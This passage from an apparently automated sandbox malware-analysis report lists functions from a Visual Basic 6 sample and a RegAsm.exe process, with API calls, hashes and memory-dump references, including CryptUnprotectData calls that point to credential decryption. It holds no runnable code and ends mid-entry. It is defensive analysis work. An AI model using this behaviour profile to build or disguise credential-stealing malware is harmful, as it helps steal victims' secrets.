                                                          • Opcode ID: 578ae8c1448dcfcc0f4e75309e42adffc6684c30020e704a763ded63c4a469fd
                                                          • Instruction ID: c5d960181de94f90b9cf5520a833aa7d35a06da1af4c124089ade7b99ae16359
                                                          • Opcode Fuzzy Hash: 578ae8c1448dcfcc0f4e75309e42adffc6684c30020e704a763ded63c4a469fd
                                                          • Instruction Fuzzy Hash: 0E716D65B1A7000B975998BE48D0966C4C7AFEF260369E63D611EF33A5FDB9CC0A120C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040358A, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 330memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00011000,-464E4580,-AB3A48E1), ref: 00403862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: ^z(
                                                          • API String ID: 4275171209-2030494510
                                                          • Opcode ID: 69b918029b12386a651cc198035e791b58bc0f87f559b8d976bac690373bce41
                                                          • Instruction ID: dfbf85627321ce4a83014a59554f7daa21cbf7f332a57b1ebc4845b201642eff
                                                          • Opcode Fuzzy Hash: 69b918029b12386a651cc198035e791b58bc0f87f559b8d976bac690373bce41
                                                          • Instruction Fuzzy Hash: B4717C26B1A7000B975998BE48D0966C4C7AFEF260369E63D611EF3365FDB9CC0A120C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040358C, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 330memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00011000,-464E4580,-AB3A48E1), ref: 00403862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: ^z(
                                                          • API String ID: 4275171209-2030494510
                                                          • Opcode ID: 7483d63f67293be80721b1f3108dfb3e35c81776aeaa58e42a6fa1aca26ae3f2
                                                          • Instruction ID: 5f9a084178d5184fb3d88cf8dd3fa375fdd6aebb3b423fea0bb48b7dd12c6b31
                                                          • Opcode Fuzzy Hash: 7483d63f67293be80721b1f3108dfb3e35c81776aeaa58e42a6fa1aca26ae3f2
                                                          • Instruction Fuzzy Hash: 8E717D66B1A7000B875988BE48D0967C4C7AFEF260369E63D611DF3365FDB9CC0A120C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004035A0, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 330memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00011000,-464E4580,-AB3A48E1), ref: 00403862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: ^z(
                                                          • API String ID: 4275171209-2030494510
                                                          • Opcode ID: cf6ff6666456f06b5d53c715fd26a5893887f6fb5bbd8280910064db2da6a0a1
                                                          • Instruction ID: 2b09b9f2530b3ce272cfcf1872c105018aa97f4aeb626be72fc9abed05a2bcad
                                                          • Opcode Fuzzy Hash: cf6ff6666456f06b5d53c715fd26a5893887f6fb5bbd8280910064db2da6a0a1
                                                          • Instruction Fuzzy Hash: 15716D65B1A7000B975998BE48D0966C4C7AFEF260369E63D651EF33A5FDB9CC0A120C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004035A2, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 330memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00011000,-464E4580,-AB3A48E1), ref: 00403862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: ^z(
                                                          • API String ID: 4275171209-2030494510
                                                          • Opcode ID: f56ca24b88e008184225e36d72b82bb2b24cbba14b4f34b39c0624edcc967553
                                                          • Instruction ID: 38a859f75f5a2e9b9156f15c17bdc40a8fd265ba54d13924f3c00f7fb796e552
                                                          • Opcode Fuzzy Hash: f56ca24b88e008184225e36d72b82bb2b24cbba14b4f34b39c0624edcc967553
                                                          • Instruction Fuzzy Hash: BF717D66B1A7000B875998BE48D0966C4C7AFEF260369E63D651DF3365FDB9CC0A220C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040358E, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 329memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00011000,-464E4580,-AB3A48E1), ref: 00403862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: ^z(
                                                          • API String ID: 4275171209-2030494510
                                                          • Opcode ID: fee373050e9c05dad242a229d6db72927db8f7a17fac034b760082eca3321c84
                                                          • Instruction ID: 60ed01a64fe559e026f014f7b2cd837c0e09fda8d5a05436a5416d92a2f556b4
                                                          • Opcode Fuzzy Hash: fee373050e9c05dad242a229d6db72927db8f7a17fac034b760082eca3321c84
                                                          • Instruction Fuzzy Hash: CC715D66B1A7000B975998BE48D0967C4C7AFEF260369E63D651EF3365FDB9CC0A120C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004035A4, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 329memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00011000,-464E4580,-AB3A48E1), ref: 00403862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: ^z(
                                                          • API String ID: 4275171209-2030494510
                                                          • Opcode ID: 27a50e679ddde43b3c6570c27ec4a78d20ea85d5ae097210a1c1a7c7be7272fb
                                                          • Instruction ID: b76a3c10af986cd15d8c9dd5a6c7cab600cac54288001238d8aa0a43875c84ac
                                                          • Opcode Fuzzy Hash: 27a50e679ddde43b3c6570c27ec4a78d20ea85d5ae097210a1c1a7c7be7272fb
                                                          • Instruction Fuzzy Hash: 84716D25B1A7000B975988BE48D0967C4C7AFEF260369E63D651EF3365FDB9CD0A120C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00403697, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 271memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00011000,-464E4580,-AB3A48E1), ref: 00403862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: ^z(
                                                          • API String ID: 4275171209-2030494510
                                                          • Opcode ID: 6f76b25c40b3a8ef45de8fac2145520f8b7baad9a9638663d61df0e3919779a0
                                                          • Instruction ID: db9e23c48cf17c69bcb1a08fd40614fa486614060072053dea8dc9602b33c5d7
                                                          • Opcode Fuzzy Hash: 6f76b25c40b3a8ef45de8fac2145520f8b7baad9a9638663d61df0e3919779a0
                                                          • Instruction Fuzzy Hash: B551AC26B1A7000B875998BE48D0912D5C7AFEF260729E23D611DF7365FEB9CC0B2208
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040371F, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 238memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00011000,-464E4580,-AB3A48E1), ref: 00403862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: ^z(
                                                          • API String ID: 4275171209-2030494510
                                                          • Opcode ID: 3a1c73a4e481d9f747f9b3ee9581ebd7f75286a5ddd0ea4c1688d1a8a5ddcf3b
                                                          • Instruction ID: cfc1d3e5e181e67efbfcf4663e56d8536ded9e922ee7d7ca941917a21d7b3f04
                                                          • Opcode Fuzzy Hash: 3a1c73a4e481d9f747f9b3ee9581ebd7f75286a5ddd0ea4c1688d1a8a5ddcf3b
                                                          • Instruction Fuzzy Hash: DA517826B1A7000B975988BE08D0966D4C7EFEF260369E63D652DF3365FDB9CC4A124C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00403827, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 173memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00011000,-464E4580,-AB3A48E1), ref: 00403862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: ^z(
                                                          • API String ID: 4275171209-2030494510
                                                          • Opcode ID: ffdf2e8d1f3dd31e283a4c1c938990df6cc5d07b273ff1299ba68ef02257919d
                                                          • Instruction ID: e689f0f8c528213acb699f4907d818edecc23586e1e45fbf0a02ae86b47fbe7f
                                                          • Opcode Fuzzy Hash: ffdf2e8d1f3dd31e283a4c1c938990df6cc5d07b273ff1299ba68ef02257919d
                                                          • Instruction Fuzzy Hash: D431C125B197000BC75989BE48C4916D4C7EFEF260765B63D612DF3395FA79CC4B1248
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 004038AC, Relevance: .2, Instructions: 181COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7b4d432ccd4d00890a5343b1168b168d5a4fb75fe1b9f609097012aab11521bc
                                                          • Instruction ID: a3efac549a0402143def7d523f2bf36ff4e16c3438ab124f50d59c48b4791ad6
                                                          • Opcode Fuzzy Hash: 7b4d432ccd4d00890a5343b1168b168d5a4fb75fe1b9f609097012aab11521bc
                                                          • Instruction Fuzzy Hash: 16219A65B2A7000F8B9988FE48D0916C4C7AFDF260365A63D611DF3396FAA9CC4B124C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004039C9, Relevance: .1, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 92aa99e8caadf07ddc65e25b03418e240b56c27e1f67df3ee5c6d4f763250049
                                                          • Instruction ID: 7e52518399d3a27c5aca762b5d4bc23598a075cfa464b1231a93a6b66469411c
                                                          • Opcode Fuzzy Hash: 92aa99e8caadf07ddc65e25b03418e240b56c27e1f67df3ee5c6d4f763250049
                                                          • Instruction Fuzzy Hash: E0F06D35B1A7004F8B689EBE88D45169AE2DBAF220320B43CA01DF3354E978CC8A524C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A4FB, Relevance: 52.7, APIs: 28, Strings: 2, Instructions: 220COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041A54D
                                                          • __vbaVarDup.MSVBVM60 ref: 0041A562
                                                          • #562.MSVBVM60(?), ref: 0041A56B
                                                          • __vbaFreeVar.MSVBVM60(?), ref: 0041A581
                                                          • __vbaNew2.MSVBVM60(00411FB0,0041B380,?), ref: 0041A5A1
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,02ABE8DC,00411FA0,00000014), ref: 0041A5C6
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411FC0,00000138), ref: 0041A5FB
                                                          • __vbaFreeObj.MSVBVM60(00000000,?,00411FC0,00000138), ref: 0041A603
                                                          • __vbaNew2.MSVBVM60(00411FB0,0041B380), ref: 0041A61B
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,02ABE8DC,00411FA0,00000014), ref: 0041A63B
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411FC0,00000138), ref: 0041A666
                                                          • __vbaFreeObj.MSVBVM60(00000000,?,00411FC0,00000138), ref: 0041A66E
                                                          • #705.MSVBVM60(?,00000000), ref: 0041A683
                                                          • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041A68D
                                                          • __vbaFreeVar.MSVBVM60(?,00000000), ref: 0041A695
                                                          • __vbaNew2.MSVBVM60(00411FB0,0041B380,?,00000000), ref: 0041A6AD
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,02ABE8DC,00411FA0,0000001C), ref: 0041A6CD
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411FF4,00000050), ref: 0041A6EC
                                                          • __vbaFreeObj.MSVBVM60(00000000,?,00411FF4,00000050), ref: 0041A6F4
                                                          • __vbaNew2.MSVBVM60(00411FB0,0041B380,?), ref: 0041A714
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,02ABE8DC,00411FA0,00000014), ref: 0041A734
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411FC0,00000068), ref: 0041A757
                                                          • __vbaFreeObj.MSVBVM60(00000000,?,00411FC0,00000068), ref: 0041A75F
                                                          • #611.MSVBVM60(00000000,?,00411FC0,00000068), ref: 0041A764
                                                          • __vbaStrMove.MSVBVM60(00000000,?,00411FC0,00000068), ref: 0041A76E
                                                          • __vbaFreeStr.MSVBVM60(0041A7A4), ref: 0041A78E
                                                          • __vbaFreeStr.MSVBVM60(0041A7A4), ref: 0041A796
                                                          • __vbaFreeStr.MSVBVM60(0041A7A4), ref: 0041A79E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: __vba$Free$CheckHresult$New2$Move$#562#611#705Copy
                                                          • String ID: Inferencing$Sprinkelvrkernes
                                                          • API String ID: 3821766861-2317132577
                                                          • Opcode ID: 51e7085789cf1d258c850246914e4ec5b3b66e0650942eb44180adf7d1a0a7f3
                                                          • Instruction ID: e4a62e94063a05c66032b052c4ea7847904c08b794f7784f8031365a27f6b6a3
                                                          • Opcode Fuzzy Hash: 51e7085789cf1d258c850246914e4ec5b3b66e0650942eb44180adf7d1a0a7f3
                                                          • Instruction Fuzzy Hash: 78719771940208ABCB10EFA5C885EDEBBB8EF18704F54413EF141B31E1D7789986CBA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A293, Relevance: 31.7, APIs: 21, Instructions: 181COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #585.MSVBVM60 ref: 0041A2E5
                                                          • __vbaFpR8.MSVBVM60 ref: 0041A2EA
                                                          • #705.MSVBVM60(?,00000000), ref: 0041A311
                                                          • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041A31B
                                                          • __vbaFreeVar.MSVBVM60(?,00000000), ref: 0041A323
                                                          • __vbaNew2.MSVBVM60(00411FB0,0041B380,?,00000000), ref: 0041A33A
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,02ABE8DC,00411FA0,00000014), ref: 0041A35E
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411FC0,000000D0), ref: 0041A387
                                                          • __vbaStrMove.MSVBVM60(00000000,?,00411FC0,000000D0), ref: 0041A395
                                                          • __vbaFreeObj.MSVBVM60(00000000,?,00411FC0,000000D0), ref: 0041A39D
                                                          • __vbaNew2.MSVBVM60(00411FB0,0041B380), ref: 0041A3B4
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,02ABE8DC,00411FA0,00000014), ref: 0041A3D8
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411FC0,000000B8), ref: 0041A404
                                                          • __vbaFreeObj.MSVBVM60(00000000,?,00411FC0,000000B8), ref: 0041A40C
                                                          • #685.MSVBVM60(00000000,?,00411FC0,000000B8), ref: 0041A411
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041A41B
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004140A8,00000044), ref: 0041A46C
                                                          • __vbaFreeObj.MSVBVM60(00000000,00000000,004140A8,00000044), ref: 0041A474
                                                          • __vbaFreeVarList.MSVBVM60(00000004,00000002,?,?,?), ref: 0041A48B
                                                          • __vbaFreeStr.MSVBVM60(0041A4E0), ref: 0041A4D2
                                                          • __vbaFreeStr.MSVBVM60(0041A4E0), ref: 0041A4DA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: __vba$Free$CheckHresult$MoveNew2$#585#685#705List
                                                          • String ID:
                                                          • API String ID: 1883905597-0
                                                          • Opcode ID: 4af66d2636b733f8bfa0d42efa1ee19e054fcf8241a6208cd623da2006dd6cd1
                                                          • Instruction ID: 8e057da6baa7aea7e884b84dbd96e27b717d54f8d68aef8176495a7c40090423
                                                          • Opcode Fuzzy Hash: 4af66d2636b733f8bfa0d42efa1ee19e054fcf8241a6208cd623da2006dd6cd1
                                                          • Instruction Fuzzy Hash: 9B515B71D40208AFDB04EF95C886EEEBBB8EF58304F14412BF505B71A1DB785985CBA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A0D8, Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 97COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,00401676), ref: 0041A0F6
                                                          • __vbaI4Str.MSVBVM60(00414088,?,?,?,?,00401676), ref: 0041A134
                                                          • #704.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041A160
                                                          • __vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041A16A
                                                          • __vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041A172
                                                          • __vbaOnError.MSVBVM60(00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041A180
                                                          • #706.MSVBVM60(00000001,00000000,00000000,00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041A192
                                                          • __vbaStrMove.MSVBVM60(00000001,00000000,00000000,00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041A19C
                                                          • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,00000001,00000000,00000000,00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041A1E6
                                                          • #595.MSVBVM60(00000002,00000000,0000000A,0000000A,0000000A,?,?,?,?,?,?,?,00000001,00000000,00000000,00000000), ref: 0041A1FD
                                                          • __vbaFreeVarList.MSVBVM60(00000004,00000002,0000000A,0000000A,0000000A,00000002,00000000,0000000A,0000000A,0000000A), ref: 0041A214
                                                          • __vbaOnError.MSVBVM60(000000FF,00414088,?,?,?,?,00401676), ref: 0041A225
                                                          • __vbaFreeStr.MSVBVM60(0041A26A,000000FF,00414088), ref: 0041A25C
                                                          • __vbaFreeStr.MSVBVM60(0041A26A,000000FF,00414088), ref: 0041A264
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: __vba$Free$ErrorMove$#595#704#706ChkstkList
                                                          • String ID: Gregarinian
                                                          • API String ID: 2605556234-529014253
                                                          • Opcode ID: 332999a956faff3ca323b17fdb63ae289050c7da44dbfd8467f33a582b4b14a0
                                                          • Instruction ID: 61711bc0fe1659fe700315f95cdbf0b0bcac3e982cefed0e12b66b7ae9c375fb
                                                          • Opcode Fuzzy Hash: 332999a956faff3ca323b17fdb63ae289050c7da44dbfd8467f33a582b4b14a0
                                                          • Instruction Fuzzy Hash: 6041FCB1D01208ABDB10EFD5C945BDDBBB9AF04314F60812AF1217B2E1DBB95A09CB59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A7C1, Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __vbaNew2.MSVBVM60(00411FB0,0041B380), ref: 0041A803
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,02ABE8DC,00411FA0,00000014), ref: 0041A827
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411FC0,000000C8), ref: 0041A850
                                                          • __vbaFreeObj.MSVBVM60 ref: 0041A858
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.47853556300.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.47853536739.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853684911.000000000041B000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: __vba$CheckHresult$FreeNew2
                                                          • String ID:
                                                          • API String ID: 4261391273-0
                                                          • Opcode ID: f46290d3cf6403a78f385dc738c220fd733660bdc44dc27ebbbb8d4edabd9919
                                                          • Instruction ID: 07dc329e075834e95cdee82abf139fa4e62b68b6e7db1671a0c815c55b28da4c
                                                          • Opcode Fuzzy Hash: f46290d3cf6403a78f385dc738c220fd733660bdc44dc27ebbbb8d4edabd9919
                                                          • Instruction Fuzzy Hash: C911A370981208ABD700AB55CC46FEFBBA8EB44744F14452AF104B31E0D7B828828BA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Analysis Process: RegAsm.exe PID: 3428 Parent PID: 2204 RegAsm.exeCOMMON

                                                          Executed Functions

                                                          Function 012876A6, Relevance: 4.0, APIs: 2, Instructions: 955libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • KiUserExceptionDispatcher.NTDLL ref: 01287727
                                                          • LdrInitializeThunk.NTDLL ref: 01287881
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52054771210.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                          Similarity
                                                          • API ID: DispatcherExceptionInitializeThunkUser
                                                          • String ID:
                                                          • API String ID: 243558500-0
                                                          • Opcode ID: f53827d9df77f0b72deb65c4886d2eac8e2dbefcaa21bd08b6dceff19d029cc9
                                                          • Instruction ID: c8dd92d4c95a237608cc5b1c552047f865b9e5c1d0794048a6021842491aa943
                                                          • Opcode Fuzzy Hash: f53827d9df77f0b72deb65c4886d2eac8e2dbefcaa21bd08b6dceff19d029cc9
                                                          • Instruction Fuzzy Hash: 8DA25C74A15224CFCB68EF74C8986ADBBB6BF88305F1040E9D50AA3794DB745E81CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 1D32DA50, Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 1D32E165
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52064570423.000000001D320000.00000040.00000010.sdmp, Offset: 1D320000, based on PE: false
                                                          Similarity
                                                          • API ID: CryptDataUnprotect
                                                          • String ID:
                                                          • API String ID: 834300711-0
                                                          • Opcode ID: 94b6ef6689f086bb3a62fb1d74244d0d0dbb0bd70a85da7a71f32e3d1a769120
                                                          • Instruction ID: a5bfeff1993654b2e2e1f6f4fc690742596d870561fac0dbab6ea6474e538fd7
                                                          • Opcode Fuzzy Hash: 94b6ef6689f086bb3a62fb1d74244d0d0dbb0bd70a85da7a71f32e3d1a769120
                                                          • Instruction Fuzzy Hash: 49113776800209DFCB10CF99C845BEEBBF8EF48324F108819EA54B7211C739A554DFA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 1D32E0FB, Relevance: 1.6, APIs: 1, Instructions: 53encryptionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 1D32E165
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52064570423.000000001D320000.00000040.00000010.sdmp, Offset: 1D320000, based on PE: false
                                                          Similarity
                                                          • API ID: CryptDataUnprotect
                                                          • String ID:
                                                          • API String ID: 834300711-0
                                                          • Opcode ID: 25cb2d6ce61104706ee91118f2f0db1ea255aa436f5e6206a648e0fdb61a87c4
                                                          • Instruction ID: 858c25e4ec12915608ca9ed309feac8a87fe6547d243bfbdb1d6d7f9be57852d
                                                          • Opcode Fuzzy Hash: 25cb2d6ce61104706ee91118f2f0db1ea255aa436f5e6206a648e0fdb61a87c4
                                                          • Instruction Fuzzy Hash: 99113476800209DFCB10CF99C945BDEBBF8EF48324F108819E914A7210C739A554DFA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 1E2753F0, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 317COMMON
                                                          Download Yara Rule
                                                          APIs
